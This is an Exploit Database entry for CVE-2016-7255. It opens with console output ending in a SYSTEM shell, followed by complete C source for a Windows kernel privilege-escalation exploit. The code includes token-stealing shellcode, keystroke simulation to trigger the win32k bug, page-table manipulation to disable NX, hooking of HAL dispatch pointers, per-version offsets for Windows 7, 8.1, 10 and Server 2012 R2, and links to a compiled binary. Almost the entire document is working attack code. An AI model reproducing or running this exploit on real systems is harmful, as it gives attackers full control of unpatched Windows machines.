821067 +] Content pte fffff67fffffe800: 1967 *** Patching the original location to enable NX... +] Patching the Spurious Offset with 1967 HAL address: fffff67b3d9e1000 +] w00t: Shellcode stored at: ffffffffffd00d50 +] Selected spurious PML4E: fffff67b3d9ecf10 +] Spurious PT: fffff67b3d9e2000 +] Content pml4e fffff67b3d9ecff8: 99f063 +] Patching the Spurious Offset with 99f067 +] Content pdpte fffff67b3d9ffff8: 9a0063 +] Patching the Spurious Offset with 9a0067 +] Content pdpte fffff67b3ffffff0: 821063 +] Patching the Spurious Offset with 821067 +] Content pte fffff67fffffe800: 1967 +] Patching the Spurious Offset with 1967 Patch HalpInterruptController->HalpApicRequestInterrupt: fffff67b3d9e26e8 with ffffffffffd00d50 Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\Users\qa\Desktop> C:\Users\qa\Desktop>whoami nt authority\system C:\Users\qa\Desktop>

Exploit Database EDB-ID : 41015

Publication date : 2017-01-07 23h00 +00:00
Author : Rick Larabee
EDB Verified : No

/* Source: https://ricklarabee.blogspot.com/2017/01/virtual-memory-page-tables-and-one-bit.html Binary: https://github.com/rlarabee/exploits/raw/8b9eb646516d7f022a010f28018209f331c28975/cve-2016-7255/compiled/cve-2016-7255.exe Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41015.exe */ // ricklarabee.blogspot.com //This program is free software; you can redistribute it and/or //modify it under the terms of the GNU General Public License //as published by the Free Software Foundation. //This program is distributed in the hope that it will be useful, //but WITHOUT ANY WARRANTY; without even the implied warranty of //MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the //GNU General Public License for more details. //You should have received a copy of the GNU General Public License //along with this program; if not, write to the Free Software //Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. // Credits: [email protected]: https://github.com/IOActive/I-know-where-your-page-lives/tree/master/code/CVE-2016-7255 // PoC from https://github.com/tinysec/public/tree/master/CVE-2016-7255 #include <windows.h> #include <wchar.h> #include <stdlib.h> #include <stdio.h> #pragma comment(lib,"ntdll.lib") #pragma comment(lib,"user32.lib") #pragma comment(lib, "advapi32") UINT64 PML4_BASE; UINT PML4_SELF_REF_INDEX; UINT64 PML4_SELF_REF = 0xFFFFF6FB7DBEDF68; #define STATUS_SUCCESS ((NTSTATUS)0x00000000L) #define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L) #define GET_INDEX(va) ( ((va >> 39) & 0x1ff )) //////////////////////////////////////////////////////// // Define Data Types //////////////////////////////////////////////////////// typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { PVOID Unknown1; PVOID Unknown2; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT NameLength; USHORT LoadCount; USHORT PathLength; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Count; SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; typedef enum _SYSTEM_INFORMATION_CLASS { SystemModuleInformation = 11, SystemHandleInformation = 16 } SYSTEM_INFORMATION_CLASS; typedef NTSTATUS (WINAPI *NtQuerySystemInformation_t)(IN SYSTEM_INFORMATION_CLASS SystemInformationClass, OUT PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength); typedef NTSTATUS (WINAPI *NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval); NtQuerySystemInformation_t NtQuerySystemInformation; NtQueryIntervalProfile_t NtQueryIntervalProfile; char shellcode[] = { //0xcc, 0xfa, // CLI 0x9c, // PUSHFQ 0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RAX, Original Pointer 0x50, // PUSH RAX 0x51, // PUSH RCX 0x48, 0xb9, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RCX, [OverwriteAddr+OverwriteOffset] 0x48, 0x89, 0x01, // MOV QWORD PTR [RCX], RAX 0xb9, 0x90, 0x90, 0x90, 0x90, // MOV ECX, PID 0x53, // PUSH RBX 0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, // MOV RAX,QWORD PTR gs:0x188 0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // MOV RAX,QWORD PTR [RAX+0xb8] EPROCESS 0x48, 0x8d, 0x80, 0x90, 0x90, 0x00, 0x00, // LEA RAX,[RAX+0xActiveProcessLinkOffset] //<tag> 0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX] 0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID 0x48, 0x83, 0xfb, 0x04, // CMP RBX,0x4 0x75, 0xf3, // JNE <tag> 0x48, 0x8b, 0x98, 0x90, 0x90, 0x90, 0x90, // MOV RBX, QWORD PTR [RAX+0x60] // GET TOKEN of SYSTEM 0x53, // PUSH RBX //<tag2> 0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX] 0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID 0x39, 0xcb, // CMP EBX, ECX // our PID 0x75, 0xf5, // JNE <tag2> 0x5b, // POP RBX 0x48, 0x89, 0x98, 0x90, 0x90, 0x90, 0x90, // MOV QWORD PTR[RAX + 0x60], RBX 0x5b, // POP RBX 0x59, // POP RCX 0x58, // POP RAX 0x9d, // POPFQ 0xfb, // STI 0xff, 0xe0 // JMP RAX }; ULONG __cdecl DbgPrint(__in char* Format, ...) { CHAR* pszDbgBuff = NULL; va_list VaList = NULL; ULONG ulRet = 0; do { pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0, 1024 * sizeof(CHAR)); if (NULL == pszDbgBuff) { break; } RtlZeroMemory(pszDbgBuff, 1024 * sizeof(CHAR)); va_start(VaList, Format); _vsnprintf((CHAR*)pszDbgBuff, 1024 - 1, Format, VaList); OutputDebugStringA(pszDbgBuff); va_end(VaList); } while (FALSE); if (NULL != pszDbgBuff) { HeapFree(GetProcessHeap(), 0, pszDbgBuff); pszDbgBuff = NULL; } return ulRet; } int _sim_key_down(WORD wKey) { INPUT stInput = { 0 }; do { stInput.type = INPUT_KEYBOARD; stInput.ki.wVk = wKey; stInput.ki.dwFlags = 0; SendInput(1, &stInput, sizeof(stInput)); } while (FALSE); return 0; } int _sim_key_up(WORD wKey) { INPUT stInput = { 0 }; do { stInput.type = INPUT_KEYBOARD; stInput.ki.wVk = wKey; stInput.ki.dwFlags = KEYEVENTF_KEYUP; SendInput(1, &stInput, sizeof(stInput)); } while (FALSE); return 0; } int _sim_alt_shift_esc() { int i = 0; do { _sim_key_down(VK_MENU); _sim_key_down(VK_SHIFT); _sim_key_down(VK_ESCAPE); _sim_key_up(VK_ESCAPE); _sim_key_down(VK_ESCAPE); _sim_key_up(VK_ESCAPE); _sim_key_up(VK_MENU); _sim_key_up(VK_SHIFT); } while (FALSE); return 0; } int _sim_alt_shift_tab(int nCount) { int i = 0; HWND hWnd = NULL; int nFinalRet = -1; do { _sim_key_down(VK_MENU); _sim_key_down(VK_SHIFT); for (i = 0; i < nCount; i++) { _sim_key_down(VK_TAB); _sim_key_up(VK_TAB); Sleep(1000); } _sim_key_up(VK_MENU); _sim_key_up(VK_SHIFT); } while (FALSE); return nFinalRet; } int _sim_alt_esc(int count) { int i = 0; for (i = 0; i<count; i++) { _sim_key_down(VK_MENU); //_sim_key_down(VK_SHIFT); _sim_key_down(VK_ESCAPE); _sim_key_up(VK_ESCAPE); _sim_key_down(VK_ESCAPE); _sim_key_up(VK_ESCAPE); _sim_key_up(VK_MENU); //_sim_key_up(VK_SHIFT); } return 0; } int or_address_value_4(__in void* pAddress) { WNDCLASSEXW stWC = { 0 }; HWND hWndParent = NULL; HWND hWndChild = NULL; WCHAR* pszClassName = L"cve-2016-7255"; WCHAR* pszTitleName = L"cve-2016-7255"; void* pId = NULL; MSG stMsg = { 0 }; UINT64 value = 0; do { stWC.cbSize = sizeof(stWC); stWC.lpfnWndProc = DefWindowProcW; stWC.lpszClassName = pszClassName; if (0 == RegisterClassExW(&stWC)) { break; } hWndParent = CreateWindowExW( 0, pszClassName, NULL, WS_OVERLAPPEDWINDOW | WS_VISIBLE, 0, 0, 360, 360, NULL, NULL, GetModuleHandleW(NULL), NULL ); if (NULL == hWndParent) { break; } hWndChild = CreateWindowExW( 0, pszClassName, pszTitleName, WS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD, 0, 0, 160, 160, hWndParent, NULL, GetModuleHandleW(NULL), NULL ); if (NULL == hWndChild) { break; } #ifdef _WIN64 pId = ((UCHAR*)pAddress - 0x28); #else pId = ((UCHAR*)pAddress - 0x14); #endif // #ifdef _WIN64 SetWindowLongPtr(hWndChild, GWLP_ID, (LONG_PTR)pId); DbgPrint("hWndChild = 0x%p\n", hWndChild); ShowWindow(hWndParent, SW_SHOWNORMAL); SetParent(hWndChild, GetDesktopWindow()); SetForegroundWindow(hWndChild); _sim_alt_shift_tab(4); SwitchToThisWindow(hWndChild, TRUE); _sim_alt_shift_esc(); while (GetMessage(&stMsg, NULL, 0, 0)) { SetFocus(hWndParent); _sim_alt_esc(20); SetFocus(hWndChild); _sim_alt_esc(20); TranslateMessage(&stMsg); DispatchMessage(&stMsg); if (value != 0) { break; } __try { value = *(UINT64 *)PML4_SELF_REF; if ((value & 0x67) == 0x67) { printf("Value Self Ref = %llx\n", value); break; } } __except (EXCEPTION_EXECUTE_HANDLER) { continue; } } } while (FALSE); if (NULL != hWndParent) { DestroyWindow(hWndParent); hWndParent = NULL; } if (NULL != hWndChild) { DestroyWindow(hWndChild); hWndChild = NULL; } UnregisterClassW(pszClassName, GetModuleHandleW(NULL)); return 0; } UINT64 get_pxe_address(UINT64 address) { UINT entry = PML4_SELF_REF_INDEX; UINT64 result = address >> 9; UINT64 lower_boundary = ((UINT64)0xFFFF << 48) | ((UINT64)entry << 39); UINT64 upper_boundary = (((UINT64)0xFFFF << 48) | ((UINT64)entry << 39) + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8; result = result | lower_boundary; result = result & upper_boundary; return result; } UINT64 look_free_entry_pml4(void) { // Looks for a free pml4e in the last 0x100 bytes of the PML4 int offset = 0xF00; UINT64 pml4_search = PML4_BASE + offset; while (offset < 0xFF8) { if ((*(PVOID *)pml4_search) == 0x0) { // This is a NULL (free) entry break; } offset += 8; pml4_search = PML4_BASE + offset; } return pml4_search; } UINT64 calculate_spurious_pt_address(UINT64 spurious_offset) { UINT64 index = (spurious_offset & 0xFFF) / 8; UINT64 result = ( ((UINT64)0xFFFF << 48) | ((UINT64)PML4_SELF_REF_INDEX << 39) | ((UINT64)PML4_SELF_REF_INDEX << 30) | ((UINT64)PML4_SELF_REF_INDEX << 21) | (index << 12) ); return result; } UINT64 create_spurious_pte_to_virtual_address(UINT64 virtual_address, BOOL patch_original) { /* 1: kd> !pte ffffffff`ffd00000 VA ffffffffffd00000 PXE at FFFFF6FB7DBEDFF8 PPE at FFFFF6FB7DBFFFF8 PDE at FFFFF6FB7FFFFFF0 PTE at FFFFF6FFFFFFE800 contains 0000000000A1F063 contains 0000000000A20063 contains 0000000000A25063 contains 8000000000103963 pfn a1f-- - DA--KWEV pfn a20-- - DA--KWEV pfn a25-- - DA--KWEV pfn 103 - G - DA--KW - V */ UINT64 pte = get_pxe_address(virtual_address); int pte_offset = pte & 0xFFF; //printf("PTE: %llx, %x\n", pte, pte_offset); UINT64 pde = get_pxe_address(pte); int pde_offset = pde & 0xFFF; //printf("PDE: %llx, %x\n", pde, pde_offset); UINT64 pdpte = get_pxe_address(pde); int pdpte_offset = pdpte & 0xFFF; //printf("PDPTE: %llx,%x\n", pdpte, pdpte_offset); UINT64 pml4e = get_pxe_address(pdpte); int pml4e_offset = pml4e & 0xFFF; //printf("PML4E: %llx\n", pml4e, pml4e_offset); UINT64 spurious_offset = look_free_entry_pml4(); printf("[+] Selected spurious PML4E: %llx\n", spurious_offset); UINT64 f_e_pml4 = spurious_offset; UINT64 spurious_pt = calculate_spurious_pt_address(spurious_offset); printf("[+] Spurious PT: %llx\n", spurious_pt); printf("--------------------------------------------------\n\n"); //Read the physical address of pml4e UINT64 pml4e_pfn = (UINT64)(*(PVOID *)pml4e); printf("[+] Content pml4e %llx: %llx\n", pml4e, pml4e_pfn); // Change the PxE pml4e_pfn = pml4e_pfn | 0x67; // Set U/S printf("[+] Patching the Spurious Offset (PML4e) %llx: %llx\n",f_e_pml4, pml4e_pfn); *((PVOID *)spurious_offset) = (PVOID)pml4e_pfn; Sleep(0x1); // Sleep for TLB refresh; //Read the physical address of pdpte UINT64 pdpte_pfn = (UINT64) *(PVOID *)(spurious_pt + pdpte_offset); printf("[+] Content pdpte %llx: %llx\n", pdpte, pdpte_pfn); // Change the PxE pdpte_pfn = pdpte_pfn | 0x67; // Set U/S printf("[+] Patching the Spurious Offset (PDPTE) %llx: %llx\n", spurious_offset, pdpte_pfn); *((PVOID *)spurious_offset) = (PVOID)pdpte_pfn; Sleep(0x1); // Sleep for TLB refresh; //Read the physical address of pde UINT64 pde_addr = spurious_pt + pde_offset; UINT64 pde_pfn = (UINT64) *(PVOID *)(spurious_pt + pde_offset); printf("[+] Content pdpe %llx: %llx\n", pde, pde_pfn); // Change the PxE pde_pfn = pde_pfn | 0x67; // Set U/S printf("[+] Patching the Spurious Offset (PDE) %llx: %llx\n", spurious_offset, pde_pfn); *((PVOID *)spurious_offset) = (PVOID)pde_pfn; Sleep(0x1); // Sleep for TLB refresh; //Read the physical address of pte UINT64 pte_addr = spurious_pt + pte_offset; UINT64 pte_pfn = (UINT64) *(PVOID *)(spurious_pt + pte_offset); printf("[+] Content pte %llx: %llx\n", pte, pte_pfn); // Change the PxE pte_pfn = pte_pfn | 0x67; // Set U/S pte_pfn = pte_pfn & 0x7fffffffffffffff; // Turn off NX if (patch_original) { printf("*** Patching the original location to enable NX...\n"); *(PVOID *)(spurious_pt + pte_offset) = (PVOID)pte_pfn; } printf("[+] Patching the Spurious Offset (PTE) %llx: %llx\n", spurious_offset, pte_pfn); *((PVOID *)spurious_offset) = (PVOID)pte_pfn; Sleep(0x1); // Sleep for TLB refresh; printf("\n\n"); return spurious_pt; } UINT64 get_OverwriteAddress_pointer(UINT64 target_address, int target_offset) { printf("[*] Getting Overwrite pointer: %llx\n", target_address); UINT64 OverwriteAddress = create_spurious_pte_to_virtual_address(target_address, FALSE); OverwriteAddress += (target_address & 0xFFF); printf("OverwriteAddress: %llx\n", OverwriteAddress); return (UINT64) *((PVOID *)(((char *)OverwriteAddress) + target_offset)); } void overwrite_TargetAddress(UINT64 hook_address, UINT64 target_address, int target_offset) { UINT64 OverwriteTarget = create_spurious_pte_to_virtual_address(target_address, FALSE); OverwriteTarget += (target_address & 0xFFF); UINT64 target = (UINT64)((char *)OverwriteTarget) + target_offset; printf("Patch OverwriteTarget: %llx with %llx\n", target, hook_address); *(PVOID *)target = (PVOID)hook_address; } UINT64 store_shellcode_in_hal(void) { //// Finally store the shellcode on the HAL UINT64 hal_heap_addr = 0xFFFFFFFFFFD00000; UINT64 hal_heap = create_spurious_pte_to_virtual_address(hal_heap_addr, TRUE); printf("HAL address: %llx\n", hal_heap); // 0xffffffffffd00d50 this is a good offset to store shellcode // 0xfff - 0xd50 = 0x2af space memcpy(((char *)hal_heap) + 0xd50, shellcode, sizeof(shellcode)); return 0xffffffffffd00d50; } UINT64 GetHalDispatchTable() { PCHAR KernelImage; SIZE_T ReturnLength; HMODULE hNtDll = NULL; UINT64 HalDispatchTable; HMODULE hKernelInUserMode = NULL; PVOID KernelBaseAddressInKernelMode; NTSTATUS NtStatus = STATUS_UNSUCCESSFUL; PSYSTEM_MODULE_INFORMATION pSystemModuleInformation; hNtDll = LoadLibrary("ntdll.dll"); if (!hNtDll) { printf("\t\t\t[-] Failed To Load NtDll.dll: 0x%X\n", GetLastError()); exit(EXIT_FAILURE); } NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(hNtDll, "NtQuerySystemInformation"); if (!NtQuerySystemInformation) { printf("\t\t\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\n", GetLastError()); exit(EXIT_FAILURE); } NtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength); // Allocate the Heap chunk pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, ReturnLength); if (!pSystemModuleInformation) { printf("\t\t\t[-] Memory Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\n", GetLastError()); exit(EXIT_FAILURE); } NtStatus = NtQuerySystemInformation(SystemModuleInformation, pSystemModuleInformation, ReturnLength, &ReturnLength); if (NtStatus != STATUS_SUCCESS) { printf("\t\t\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\n", GetLastError()); exit(EXIT_FAILURE); } KernelBaseAddressInKernelMode = pSystemModuleInformation->Module[0].Base; KernelImage = strrchr((PCHAR)(pSystemModuleInformation->Module[0].ImageName), '\\') + 1; printf("\t\t\t[+] Loaded Kernel: %s\n", KernelImage); printf("\t\t\t[+] Kernel Base Address: 0x%p\n", KernelBaseAddressInKernelMode); hKernelInUserMode = LoadLibraryA(KernelImage); if (!hKernelInUserMode) { printf("\t\t\t[-] Failed To Load Kernel: 0x%X\n", GetLastError()); exit(EXIT_FAILURE); } // This is still in user mode HalDispatchTable = (UINT64)GetProcAddress(hKernelInUserMode, "HalDispatchTable"); if (!HalDispatchTable) { printf("\t\t\t[-] Failed Resolving HalDispatchTable: 0x%X\n", GetLastError()); exit(EXIT_FAILURE); } else { HalDispatchTable = (ULONGLONG)HalDispatchTable - (ULONGLONG)hKernelInUserMode; // Here we get the address of HapDispatchTable in Kernel mode HalDispatchTable = ((ULONGLONG)HalDispatchTable + (ULONGLONG)KernelBaseAddressInKernelMode); printf("\t\t\t[+] HalDispatchTable: 0x%llx\n", HalDispatchTable); } HeapFree(GetProcessHeap(), 0, (LPVOID)pSystemModuleInformation); if (hNtDll) { FreeLibrary(hNtDll); } if (hKernelInUserMode) { FreeLibrary(hKernelInUserMode); } hNtDll = NULL; hKernelInUserMode = NULL; pSystemModuleInformation = NULL; return HalDispatchTable; } int __cdecl main(int argc, char** argv) { TCHAR pre_username[256]; TCHAR post_username[256]; DWORD size = 256; ULONG Interval = 0; HMODULE hNtDll = NULL; UINT retval; UINT64 overwrite_address; int overwrite_offset; // define operating system version specific variables unsigned char sc_KPROCESS; unsigned int sc_TOKEN; unsigned int sc_APLINKS; int osversion; if (argc != 2) { printf("Please enter an OS version\n"); printf("The following OS'es are supported:\n"); printf("\t[*] 7 - Windows 7\n"); printf("\t[*] 81 - Windows 8.1\n"); printf("\t[*] 10 - Windows 10 prior to build release 14393 (Anniversary Update)\n"); printf("\t[*] 12 - Windows 2012 R2\n"); printf("\n"); printf("\t[*] For example: cve-2016-7255.exe 7 -- for Windows 7\n"); return -1; } osversion = _strtoui64(argv[1], NULL, 10); if(osversion == 7) { // the target machine's OS is Windows 7 SP1 printf(" [+] Windows 7 SP1\n"); sc_KPROCESS = 0x70; // dt -r1 nt!_KTHREAD +0x050 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS sc_TOKEN = 0x80; // dt -r1 nt!_EPROCESS [+0x208 Token : _EX_FAST_REF] - [+0x188 ActiveProcessLinks : _LIST_ENTRY] = (0x80) sc_APLINKS = 0x188; // dt -r1 nt!_EPROCESS +0x188 ActiveProcessLinks : _LIST_ENTRY overwrite_address = GetHalDispatchTable(); // HalDispatchTable overwrite_offset = 0x8; // QueryIntervalProfile } else if(osversion == 81) { // the target machine's OS is Windows 8.1 printf(" [+] Windows 8.1\n"); sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60) sc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY overwrite_address = 0xffffffffffd00510; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)) overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt) } else if(osversion == 10) { // the target machine's OS is Windows 10 prior to build 14393 printf(" [+] Windows 10\n"); sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS sc_TOKEN = 0x68; // dt -r1 nt!_EPROCESS [+0x358 Token : _EX_FAST_REF] - [+0x2f0 ActiveProcessLinks : _LIST_ENTRY] = (0x60) sc_APLINKS = 0x2f0; // dt -r1 nt!_EPROCESS +0x2f0 ActiveProcessLinks : _LIST_ENTRY overwrite_address = 0xffffffffffd004c0; // HalpInterruptController_address (dq poi(hal!HalpInterruptController) overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt) } else if(osversion == 12) { // the target machine's OS is Windows 2012 R2 printf(" [+] Windows 2012 R2\n"); sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60) sc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY overwrite_address = 0xffffffffffd12c70; // HalpInterruptController_address (dq poi(hal!HalpInterruptController) overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt) } // in case the OS version is not any of the previously checked versions else { printf(" [-] Unsupported version\n"); printf(" [*] Affected 64-bit operating systems\n"); printf(" [*] Windows 7 SP1 -- cve-2016-7255.exe 7\n"); printf(" [*] Windows 8.1 -- cve-2016-7255.exe 81\n"); printf(" [*] Windows 10 before build 14393 -- cve-2016-7255.exe 10\n"); printf(" [*] Windows 2012 R2 -- cve-2016-7255.exe 12\n"); return -1; } printf("My PID is: %d\n", GetCurrentProcessId()); GetUserName(pre_username, &size); printf("Current Username: %s\n", pre_username); printf("PML4 Self Ref: %llx\n", PML4_SELF_REF); printf("Shellcode stored at: %p\n", (void *) &shellcode); printf("Enter to continue...\n"); getchar(); do { or_address_value_4((void*)PML4_SELF_REF); } while (FALSE); PML4_SELF_REF_INDEX = GET_INDEX((UINT64)PML4_SELF_REF); printf("[*] Self Ref Index: %x\n", PML4_SELF_REF_INDEX); PML4_BASE = ((UINT64)PML4_SELF_REF & (UINT64)0xFFFFFFFFFFFFF000); UINT64 original_pointer = get_OverwriteAddress_pointer(overwrite_address, overwrite_offset); printf("Original OverwriteTarget pointer: %llx\n", original_pointer); DWORD pid = GetCurrentProcessId(); /* Shellcode Patching !! */ char *p = shellcode; p += 4; // skip the CLI, PUSHF and MOV RAX bytes *(PVOID *)p = (PVOID)original_pointer; // Patch shellcode1 p += 12; // Patch shellcode with original value in the Overwrite address *(PVOID *)p = (PVOID)(overwrite_address + overwrite_offset); p += 12; // To patch the PID of our process *(DWORD *)p = (DWORD)pid; p += 17; *(unsigned char *)p = (unsigned char)sc_KPROCESS; p += 7; *(unsigned int *)p = (unsigned int)sc_APLINKS; p += 20; *(unsigned int *)p = (unsigned int)sc_TOKEN; p += 20; *(unsigned int *)p = (unsigned int)sc_TOKEN; UINT64 shellcode_va = store_shellcode_in_hal(); printf("[+] w00t: Shellcode stored at: %llx\n", shellcode_va); overwrite_TargetAddress(shellcode_va, overwrite_address, overwrite_offset); if (osversion == 7){ // Exploit Win7.1 hNtDll = LoadLibrary("ntdll.dll"); if (!hNtDll) { printf("\t\t[-] Failed loading NtDll: 0x%X\n", GetLastError()); exit(EXIT_FAILURE); } NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtDll, "NtQueryIntervalProfile"); if (!NtQueryIntervalProfile) { printf("\t\t[-] Failed Resolving NtQueryIntervalProfile: 0x%X\n", GetLastError()); exit(EXIT_FAILURE); } NtQueryIntervalProfile(0x1337, &Interval); } while (1) { size = 256; GetUserName(post_username, &size); if (memcmp(post_username, pre_username, 256) != 0) break; } Sleep(2000); system("cmd.exe"); return 0; }